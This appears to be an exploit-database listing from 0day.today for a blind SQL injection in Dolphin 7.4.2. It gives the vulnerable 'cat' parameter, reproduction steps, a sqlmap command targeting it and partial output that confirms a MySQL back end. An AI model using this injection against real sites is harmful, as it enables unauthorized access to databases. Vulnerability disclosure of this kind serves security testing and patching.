[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dolphin 7.4.2 Blind SQL Injection Vulnerability

Author
Andrey Stoykov
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-39705
Category
web applications
Date add
07-08-2024
Platform
php
# Exploit Title: Blind SQL Injection - dolphinv7.4.2.
# Date: 8/2024
# Exploit Author: Andrey Stoykov
# Version: 7.4.2
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/07/friday-fun-pentest-series-8-dolphinv742.html


SQL Injection:

Steps to Reproduce:

1. Navigate to "Builders" menu
2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar
3. That is the injection point

sqlmap -r request.txt --dbms=mysql -p cat

[...]
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Apache
back-end DBMS: MySQL >= 5.0.12
[...]

#  0day.today [2024-09-19]  #